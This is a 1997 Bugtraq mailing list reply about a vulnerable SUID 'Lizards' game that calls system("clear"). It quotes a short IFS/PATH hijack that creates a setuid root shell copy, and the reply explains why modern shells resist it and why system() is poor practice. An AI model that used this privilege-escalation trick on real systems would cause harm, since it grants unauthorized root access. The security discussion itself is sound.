Bugtraq mailing list archives
Re: Vunerability in Lizards game
From: hzoli () FRONTIERNET NET (Zoltan Hidvegi)
Date: Tue, 18 Nov 1997 21:14:49 -0600
Joe Zbiciak wrote:
John Dow said previously: | - but then again, my system("clear") wasn't particularly | elegant either. How about system("/usr/bin/clear")? That won't work. An attack along these lines will slice through that "fix" pretty quickly, if I'm not mistaken. export IFS=/ export PATH=.:$PATH echo "cp /bin/sh ./root_sh; chmod 4755 ./root_sh" > ./usr chmod 755 ./usr lizards
Actually recent POSIX shells are immune to this kind of attack, since IFS is only used to split the result of parameter expansion. No shells under Linux has this behaviour. This system() call seems to be secure, but it is still bad practice. Recent shells disable .bashrc, $ENV etc. processing when euid != uid or egid != gid and functions are not imported (see the privileged option in the bash manual).
"system()" is just not cut out for security.
Definitely. And its performance is also quite bad. It's a waste of resources to fork/exec a large shell just to execute a tiny program. Zoltan
Current thread:
- Microsoft Office security bug, (continued)
- Microsoft Office security bug Aleph One (Nov 07)
- Re: Microsoft Office security bug Inigo Gonzalez (Nov 11)
- What were the opcodes to hang a Pentium again? (fwd) Darren Reed (Nov 11)
- Re: Microsoft Office security bug Aleph One (Nov 11)
- Vunerability in Lizards game SUID (Nov 11)
- Re: Vunerability in Lizards game Alex Murray (Nov 12)
- Re: Vunerability in Lizards game Olaf Titz (Nov 13)
- Re: Vunerability in Lizards game Kragen \ (Nov 13)
- Re: Vunerability in Lizards game Neil Levine (Nov 17)
- Re: Vunerability in Lizards game Joe Zbiciak (Nov 18)
- Re: Vunerability in Lizards game Zoltan Hidvegi (Nov 18)
- Major Security Flaw in Cybercash 2.1.2 Kerri Kraft (Nov 19)
- IP DOS attacks -- Win95 and WinNT Paul Leach (Nov 18)
- Microsoft Office security bug Aleph One (Nov 07)
- Updating microcode on the fly Superuser (Nov 12)
- Re: Updating microcode on the fly Jyri Kaljundi (Nov 12)
- solaris 251 & syslogd Michael Helm (Nov 12)
- Re: solaris 251 & syslogd Richard Peters (Nov 12)
- Re: solaris 251 & syslogd Dave Kinchlea (Nov 12)
- CERT Advisory CA-97.25 - REVISED- Code Correction Aleph One (Nov 12)
- Bug In Security Dynamics' FTP server (Version 2.2) sp00n (Nov 12)
- Intel Pentium Bug: BSDI Releases a patch Joe Ilacqua (Nov 11)